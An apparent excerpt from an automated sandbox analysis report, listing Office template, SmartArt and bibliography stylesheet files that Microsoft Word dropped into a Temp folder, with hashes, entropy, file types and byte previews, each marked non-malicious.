                                    SSDEEP:6:fxnxUXGE2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny4GHmD0+dAH/luWvv
                                    MD5:2240CF2315F2EB448CEA6E9CE21B5AC5
                                    SHA1:46332668E2169E86760CBD975FF6FA9DB5274F43
                                    SHA-256:0F7D0BD5A8CED523CFF4F99D7854C0EE007F5793FA9E1BA1CD933B0894BFBD0D
                                    SHA-512:10BA73FF861112590BF135F4B337346F9D4ACEB10798E15DC5976671E345BC29AC8527C6052FEC86AA7058E06D1E49052E49D7BCF24A01DB259B5902DB091182
                                    Malicious:false
                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .r.i.n.g.s...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                    C:\Users\user\AppData\Local\Temp\TCD9C2B.tmp\rings.glox

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):5151
                                    Entropy (8bit):7.859615916913808
                                    Encrypted:false
                                    SSDEEP:96:WkV3UHhcZDEteEJqeSGzpG43GUR8m8b6dDLiCTfjKPnD6H5RhfuDKNtxx3+7tDLp:Wq3UBc9EJqIpGgD5dDL1DjKvDKhfnNti
                                    MD5:6C24ED9C7C868DB0D55492BB126EAFF8
                                    SHA1:C6D96D4D298573B70CF5C714151CF87532535888
                                    SHA-256:48AF17267AD75C142EFA7AB7525CA48FAB579592339FB93E92C4C4DA577D4C9F
                                    SHA-512:A3E9DC48C04DC8571289F57AE790CA4E6934FBEA4FDDC20CB780F7EA469FE1FC1D480A1DBB04D15301EF061DA5700FF0A793EB67D2811C525FEF618B997BCABD
                                    Malicious:false
                                    Preview:PK.........nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........5nB;.ndX....`......._rels/.rels...J.1.._%..f.J.J..x..AJ.2M&......g..#............|.c..x{_._..^0e.|.gU..z.....#.._..[..JG.m.....(...e..r."....P)....3..M].E:..SO.;D..c..J..rt...c.,.....a.;.....$.../5..D.Ue.g...Q3......5.':...@...~t{.v..QA>.P.R.A~..^AR.S4G......].n...x41....PK.........^5..s.V....Z......diagrams/layout1.xml.[]o.F.}N~..S.......VU.U+m6R........&.d.}...{M....Q.S....p9.'./O..z."..t>q....."[..j>y..?...u....[.}..j-...?Y..Bdy.I./.....0.._.....-.s...rj...I..=..<..9.|>YK.....o.|.my.F.LlB..be/E.Y!.$6r.f/.p%.......U....e..W.R..fK....`+?.rwX.[.b..|..O>o.|.....>1.......trN`7g..Oi.@5..^...]4.r...-y...T.h...[.j1..v....G..........nS..m..E"L...s

                                    C:\Users\user\AppData\Local\Temp\TCD9C2D.tmp\Content.inf

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):286
                                    Entropy (8bit):3.4670546921349774
                                    Encrypted:false
                                    SSDEEP:6:fxnxUX0XPYDxUloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyEXPYDCloGHmD0+dAH/luWvv
                                    MD5:3D52060B74D7D448DC733FFE5B92CB52
                                    SHA1:3FBA3FFC315DB5B70BF6F05C4FF84B52A50FCCBC
                                    SHA-256:BB980559C6FC38B703D1E9C41720D5CE8D00D2FF86D4F25136DB02B1E54B1518
                                    SHA-512:952EF139A72562A528C1052F1942DAE1C0509D67654BF5E7C0602C87F90147E8EE9E251D2632BCB5B511AB2FF8A3734293D0A4E3DBD3D187F5E3C042685F9A0C
                                    Malicious:false
                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.h.e.m.e.P.i.c.t.u.r.e.A.l.t.e.r.n.a.t.i.n.g.A.c.c.e.n.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                    C:\Users\user\AppData\Local\Temp\TCD9C2D.tmp\ThemePictureAlternatingAccent.glox

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                    Category:dropped
                                    Size (bytes):5630
                                    Entropy (8bit):7.87271654296772
                                    Encrypted:false
                                    SSDEEP:96:n5ni6jKZWsD+QJaUQ7R6qYFF5QS+BEgeJam6S7ZCHuKViGa2CnnLYLt/ht:nccqxIBdQ1QS+uDJanS7ZCHHVdJCnLY5
                                    MD5:2F8998AA9CF348F1D6DE16EAB2D92070
                                    SHA1:85B13499937B4A584BEA0BFE60475FD4C73391B6
                                    SHA-256:8A216D16DEC44E02B9AB9BBADF8A11F97210D8B73277B22562A502550658E580
                                    SHA-512:F10F7772985EDDA442B9558127F1959FF0A9909C7B7470E62D74948428BFFF7E278739209E8626AE5917FF728AFB8619AE137BEE2A6A4F40662122208A41ABB2
                                    Malicious:false
                                    Preview:PK...........<..W8...j.......diagrams/layout1.xmlz........]......Hy..{...n .l.:.D.vvW..s....-a..fg&.}.\..+......4M..'=...(._.U]U......_.....U...k}.y.,......C..._^.......w/."7....v..Ea........Q..u..D{..{v.x.]....AtB15u..o...w..o.1...f.L...I<[zk7..7^..,.h.&l3...#..)..'H..d.r.#w=b...Ocw.y.&.v..t.>.s..m^M7..8I?o7................H...b....Qv.;'..%.f..#vR....V.H.),g..`...)(..m...[l...b...,.....U...Q.{.y.y.....G.I.tT.n..N.....A.tR..tr....i.<.......,.n:.#.A..a!X.......DK..;v..._M..lSc../n...v.....}.....I.|8.!b.C..v..|.....4l..n.;<9.i./..}!&2.c/.r...>.X02[..|.a.-.....$#-....>...{.M].>3.,\o.x....X%;.F.k.)*".I8<.0..#......?.h..-..O.2.B.s..v....{Abd...h0....H..I.. ...%...$1.Fyd..Y....U...S.Y.#.V.....TH(....%..nk.3Y.e.m.-.S..Q...j.Ai..E..v......4.t.|..&"...{..4.!.h.....C.P.....W...d[.....U<Yb;B.+W.!.@B....!.=......b"...Y.N;.#..Q...0G.lW...]7:...#9!z......|f..r..x.....t........`.uL1u.:.....U.D.n.<Q.[%...ngC./..|...!..q;;.w.".D..lt.".l.4".mt...E..mt

                                    C:\Users\user\AppData\Local\Temp\TCD9C2E.tmp\Content.inf

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):256
                                    Entropy (8bit):3.464918006641019
                                    Encrypted:false
                                    SSDEEP:6:fxnxUXR+EqRGRnRE3QepmlJ0+3FbnKfZObdADxp1RDWlVwv:fxnyB+5RmRGHmD0wbnKYZAH+Vwv
                                    MD5:93149E194021B37162FD86684ED22401
                                    SHA1:1B31CAEBE1BBFA529092BE834D3B4AD315A6F8F1
                                    SHA-256:50BE99A154A6F632D49B04FCEE6BCA4D6B3B4B7C1377A31CE9FB45C462D697B2
                                    SHA-512:410A7295D470EC85015720B2B4AC592A472ED70A04103D200FA6874BEA6A423AF24766E98E5ACAA3A1DBC32C44E8790E25D4611CD6C0DBFFFE8219D53F33ACA7
                                    Malicious:false
                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .E.q.u.a.t.i.o.n.s...d.o.t.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.W.D. .D.o.c.u.m.e.n.t. .P.a.r.t.s.}.........

                                    C:\Users\user\AppData\Local\Temp\TCD9C2E.tmp\Equations.dotx

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Word 2007+
                                    Category:dropped
                                    Size (bytes):51826
                                    Entropy (8bit):5.541375256745271
                                    Encrypted:false
                                    SSDEEP:384:erH5dYPCA4t3aEFGiSUDtYfEbi5Ry/AT7/6tHODaFlDSomurYNfT4A0VIwWNS89u:Q6Cbh9tENyWdaFUSYNfZS89/3qtEu
                                    MD5:2AB22AC99ACFA8A82742E774323C0DBD
                                    SHA1:790F8B56DF79641E83A16E443A75A66E6AA2F244
                                    SHA-256:BC9D45D0419A08840093B0BF4DCF96264C02DFE5BD295CD9B53722E1DA02929D
                                    SHA-512:E5715C0ECF35CE250968BD6DE5744D28A9F57D20FD6866E2AF0B2D8C8F80FEDC741D48F554397D61C5E702DA896BD33EED92D778DBAC71E2E98DCFB0912DE07B
                                    Malicious:false
                                    Preview:PK.........R.@c}LN4...........[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.....D....>.V...f-}..r9....=..Mn..U..5.(.....a...E..b....*..w.$...,O_fu."[P..WU=.;.....5..wdt..y1.......i.44-.r....;./.biG.Cd.n.j.{/......V....c..^^.E.H?H.........B.........<...Ae.l.]..{....mK......B....

                                    C:\Users\user\AppData\Local\Temp\TCD9C3F.tmp\Content.inf

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):254
                                    Entropy (8bit):3.4721586910685547
                                    Encrypted:false
                                    SSDEEP:6:fxnxUX9+RclTloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyteUTloGHmD0+dAH/luWvv
                                    MD5:4DD225E2A305B50AF39084CE568B8110
                                    SHA1:C85173D49FC1522121AA2B0B2E98ADF4BB95B897
                                    SHA-256:6F00DD73F169C73D425CB9895DAC12387E21C6E4C9C7DDCFB03AC32552E577F4
                                    SHA-512:0493AB431004191381FF84AD7CC46BD09A1E0FEEC16B3183089AA8C20CC7E491FAE86FE0668A9AC677F435A203E494F5E6E9E4A0571962F6021D6156B288B28A
                                    Malicious:false
                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .c.h.e.v.r.o.n.a.c.c.e.n.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                    C:\Users\user\AppData\Local\Temp\TCD9C3F.tmp\chevronaccent.glox

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):4243
                                    Entropy (8bit):7.824383764848892
                                    Encrypted:false
                                    SSDEEP:96:22MQe4zHye8/djzF+JjvtmMkkBpF7e0LTkaf:22De4zHHCvF+nRBDXoaf
                                    MD5:7BC0A35807CD69C37A949BBD51880FF5
                                    SHA1:B5870846F44CAD890C6EFF2F272A037DA016F0D8
                                    SHA-256:BD3A013F50EBF162AAC4CED11928101554C511BD40C2488CF9F5842A375B50CA
                                    SHA-512:B5B785D693216E38B5AB3F401F414CADACCDCB0DCA4318D88FE1763CD3BAB8B7670F010765296613E8D3363E47092B89357B4F1E3242F156750BE86F5F7E9B8D
                                    Malicious:false
                                    Preview:PK........NnB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........TnB;..d.....h......._rels/.rels...J.0.._%.n..)"....<.w.&.4..!...y.|.........|.&3.o.....S..K.T5g.U....g..n.f....T*.hcf...D.V..Ft....d....c2".z.....N.s._2....7.0.V.]P.CO?...`...8....4&......_i..Y.T...Z...g....{-...]..pH..@.8....}tP.)..B>..A...S&......9..@...7........b_.PK........r};5.z..............diagrams/layout1.xml.X.n.8.}.........4.+.(...@......(..J..._.!)..b..v.}.H..zf8...dhM....E..I.H..V.Y.R..2zw5L~....^..]...J_..4.\.\......8..z..2T..".X.l.F#......5....,*....c....r.kR.I.E..,.2...&%..''.qF.R.2.....T;F...W.. ...3...AR.OR.O..J}.w6..<...,.x..x....`g?.t.I.{.I...|X..g.....<BR..^...Q.6..m.kp...ZuX.?.z.YO.g...$.......'.]..I.#...]$/~`${.

                                    C:\Users\user\AppData\Local\Temp\TCD9C41.tmp\Content.inf

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):280
                                    Entropy (8bit):3.484503080761839
                                    Encrypted:false
                                    SSDEEP:6:fxnxUXGdQ1MecJZMlWlk2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny2dQ98MlWlzGHmD0+dAH/luWvv
                                    MD5:1309D172F10DD53911779C89A06BBF65
                                    SHA1:274351A1059868E9DEB53ADF01209E6BFBDFADFB
                                    SHA-256:C190F9E7D00E053596C3477455D1639C337C0BE01012C0D4F12DFCB432F5EC56
                                    SHA-512:31B38AD2D1FFF93E03BF707811F3A18AD08192F906E36178457306DDAB0C3D8D044C69DE575ECE6A4EE584800F827FB3C769F98EA650F1C208FEE84177070339
                                    Malicious:false
                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .I.n.t.e.r.c.o.n.n.e.c.t.e.d.B.l.o.c.k.P.r.o.c.e.s.s...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                    C:\Users\user\AppData\Local\Temp\TCD9C41.tmp\InterconnectedBlockProcess.glox

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                    Category:dropped
                                    Size (bytes):9191
                                    Entropy (8bit):7.93263830735235
                                    Encrypted:false
                                    SSDEEP:192:oeAMExvPJMg+yE+AfJLi3+Xoj7F3sPgMG61J88eDhFWT7hFNsdJtnLYJ7tSh:v2d+hnfJLi3+4ja4WqhFWT7FsdHMA
                                    MD5:08D3A25DD65E5E0D36ADC602AE68C77D
                                    SHA1:F23B6DDB3DA0015B1D8877796F7001CABA25EA64
                                    SHA-256:58B45B9DBA959F40294DA2A54270F145644E810290F71260B90F0A3A9FCDEBC1
                                    SHA-512:77D24C272D67946A3413D0BEA700A7519B4981D3B4D8486A655305546CE6133456321EE94FD71008CBFD678433EA1C834CFC147179B31899A77D755008FCE489
                                    Malicious:false
                                    Preview:PK.........]w>....<...5.......diagrams/layout1.xmlz........].r.F.}......1w`.J..'.......w..Dn. d....~........pw...O.......s...?...p7.t>e.r<.]u.e..d..|8..\uo.......K...._.Y..E6.|..y;........y.*/:o./...:[.o.+/.....?.....Z.?..s..d}...S.`...b.^o9.e.ty9_d...y>M.....7...e....."....<.v.u...e:].N.t....a....0..}..bQ.Y..>.~..~...U.|..Ev.....N...bw....{...O..Y.Y.&........A.8Ik...N.Z.P.[}t........|m...E..v..,..6........_?..."..K<.=x....$..%@.e..%....$=F..G..e........<F..G51..;......=...e.e.q..d......A...&9'.N.\%.=N.Z.9.s......y.4.Q.c......|8.......Eg.:.ky.z.h.......).O...mz...N.wy.m...yv....~8.?Lg..o.l.y:.....z.i..j.irxI.w...r.......|.=....s};.\u.{t;i~S.......U7..mw...<.vO...M.o...W.U.....}.`V<|..%....l..`>]..".].I.i.N..Z..~Lt.........}?..E~:..>$......x...%.........N....'C.m.=...w.=.Y...+'M.].2 >.]_~...'.?...:....z.O..Y......6..5...sj?.....).B..>.3...G...p.9.K!..[H..1$v../...E V..?`....+[...C......h..!.QI5....<.>...A.d.......

                                    C:\Users\user\AppData\Local\Temp\TCD9C42.tmp\Content.inf

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):292
                                    Entropy (8bit):3.5026803317779778
                                    Encrypted:false
                                    SSDEEP:6:fxnxUXC89ADni8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyf9ADiNGHmD0wbnKYZAH/lMZqiv
                                    MD5:A0D51783BFEE86F3AC46A810404B6796
                                    SHA1:93C5B21938DA69363DBF79CE594C302344AF9D9E
                                    SHA-256:47B43E7DBDF8B25565D874E4E071547666B08D7DF4D736EA8521591D0DED640F
                                    SHA-512:CA3DB5A574745107E1D6CAA60E491F11D8B140637D4ED31577CC0540C12FDF132D8BC5EBABEA3222F4D7BA1CA016FF3D45FE7688D355478C27A4877E6C4D0D75
                                    Malicious:false
                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .g.o.s.t.t.i.t.l.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                    C:\Users\user\AppData\Local\Temp\TCD9C42.tmp\gosttitle.xsl

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):251032
                                    Entropy (8bit):5.102652100491927
                                    Encrypted:false
                                    SSDEEP:6144:hwprA5R95vtfb8p4bgWPwW6/m26AnV9IBgIkqm6HITUZJcjUZS1XkaNPQTlvB2zr:JA
                                    MD5:F425D8C274A8571B625EE66A8CE60287
                                    SHA1:29899E309C56F2517C7D9385ECDBB719B9E2A12B
                                    SHA-256:DD7B7878427276AF5DBF8355ECE0D1FE5D693DF55AF3F79347F9D20AE50DB938
                                    SHA-512:E567F283D903FA533977B30FD753AA1043B9DDE48A251A9AC6777A3B67667443FEAD0003765A630D0F840B6C275818D2F903B6CB56136BEDCC6D9BDD20776564
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                    C:\Users\user\AppData\Local\Temp\TCD9C43.tmp\Content.inf

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):286
                                    Entropy (8bit):3.5502940710609354
                                    Encrypted:false
                                    SSDEEP:6:fxnxUXfQICl8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyXClNGHmD0wbnKYZAH/lMZqiv
                                    MD5:9B8D7EFE8A69E41CDC2439C38FE59FAF
                                    SHA1:034D46BEC5E38E20E56DD905E2CA2F25AF947ED1
                                    SHA-256:70042F1285C3CD91DDE8D4A424A5948AE8F1551495D8AF4612D59709BEF69DF2
                                    SHA-512:E50BB0C68A33D35F04C75F05AD4598834FEC7279140B1BB0847FF39D749591B8F2A0C94DA4897AAF6C33C50C1D583A836B0376015851910A77604F8396C7EF3C
                                    Malicious:false
                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .i.s.o.6.9.0...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                    C:\Users\user\AppData\Local\Temp\TCD9C43.tmp\iso690.xsl

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):270198
                                    Entropy (8bit):5.073814698282113
                                    Encrypted:false
                                    SSDEEP:6144:JwprAiaR95vtfb8pDbgWPzDCvCmvQursq7vImej/yQ4SS1apSiQhHDOruvoVeMUX:We
                                    MD5:FF0E07EFF1333CDF9FC2523D323DD654
                                    SHA1:77A1AE0DD8DBC3FEE65DD6266F31E2A564D088A4
                                    SHA-256:3F925E0CC1542F09DE1F99060899EAFB0042BB9682507C907173C392115A44B5
                                    SHA-512:B4615F995FAB87661C2DBE46625AA982215D7BDE27CAFAE221DCA76087FE76DA4B4A381943436FCAC1577CB3D260D0050B32B7B93E3EB07912494429F126BB3D
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                    C:\Users\user\AppData\Local\Temp\TCD9C54.tmp\Content.inf

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):332
                                    Entropy (8bit):3.4871192480632223
                                    Encrypted:false
                                    SSDEEP:6:fxnxUXsdDUaw93Ti8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyoRw9eNGHmD0wbnKYZAH/lMZqiv
                                    MD5:333BA58FCE326DEA1E4A9DE67475AA95
                                    SHA1:F51FAD5385DC08F7D3E11E1165A18F2E8A028C14
                                    SHA-256:66142D15C7325B98B199AB6EE6F35B7409DE64EBD5C0AB50412D18CBE6894097
                                    SHA-512:BFEE521A05B72515A8D4F7D13D8810846DC60F1E85C363FFEBD6CACD23AE8D2E664C563FC74700A4ED4E358F378508D25C46CB5BE1CF587E2E278EBC22BB2625
                                    Malicious:false
                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .m.l.a.s.e.v.e.n.t.h.e.d.i.t.i.o.n.o.f.f.i.c.e.o.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                    C:\Users\user\AppData\Local\Temp\TCD9C54.tmp\mlaseventheditionofficeonline.xsl

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):254875
                                    Entropy (8bit):5.003842588822783
                                    Encrypted:false
                                    SSDEEP:6144:MwprAnniNgtfbzbOWPuv7kOMBLitjAUjTQLrYHwR0TnyDkHqV3iPr1zHX5T6SSXj:a
                                    MD5:377B3E355414466F3E3861BCE1844976
                                    SHA1:0B639A3880ACA3FD90FA918197A669CC005E2BA4
                                    SHA-256:4AC5B26C5E66E122DE80243EF621CA3E1142F643DD2AD61B75FF41CFEE3DFFAF
                                    SHA-512:B050AD52A8161F96CBDC880DD1356186F381B57159F5010489B04528DB798DB955F0C530465AB3ECD5C653586508429D98336D6EB150436F1A53ABEE0697AEB9
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>...</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />......<xsl:variable name="prop_EndChars">.....<xsl:call-template name="templ_prop_EndChars"/>....</xsl:variable>......<xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parameters" />......

                                    C:\Users\user\AppData\Local\Temp\TCD9C64.tmp\Content.inf

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):274
                                    Entropy (8bit):3.438490642908344
                                    Encrypted:false
                                    SSDEEP:6:fxnxUXZlaWimoa2nRE3QepmlJ0+3FbnKfZObdADxp1RDWlVwv:fxnyplagN2RGHmD0wbnKYZAH+Vwv
                                    MD5:0F98498818DC28E82597356E2650773C
                                    SHA1:1995660972A978D17BC483FCB5EE6D15E7058046
                                    SHA-256:4587CA0B2A60728FF0A5B8E87D35BF6C6FDF396747E13436EC856612AC1C6288
                                    SHA-512:768562F20CFE15001902CCE23D712C7439721ECA6E48DDDCF8BFF4E7F12A3BC60B99C274CBADD0128EEA1231DB19808BAA878E825497F3860C381914C21B46FF
                                    Malicious:false
                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .E.l.e.m.e.n.t. .d.e.s.i.g.n. .s.e.t...d.o.t.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.W.D. .D.o.c.u.m.e.n.t. .P.a.r.t.s.}.........

                                    C:\Users\user\AppData\Local\Temp\TCD9C64.tmp\Element design set.dotx

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Word 2007+
                                    Category:dropped
                                    Size (bytes):34415
                                    Entropy (8bit):7.352974342178997
                                    Encrypted:false
                                    SSDEEP:768:ev13NPo9o5NGEVIi3kvH+3SMdk7zp3tE2:ev13xoOE+R3BkR7
                                    MD5:7CDFFC23FB85AD5737452762FA36AAA0
                                    SHA1:CFBC97247959B3142AFD7B6858AD37B18AFB3237
                                    SHA-256:68A8FBFBEE4C903E17C9421082E839144C205C559AFE61338CBDB3AF79F0D270
                                    SHA-512:A0685FD251208B772436E9745DA2AA52BC26E275537688E3AB44589372D876C9ACE14B21F16EC4053C50EB4C8E11787E9B9D922E37249D2795C5B7986497033E
                                    Malicious:false
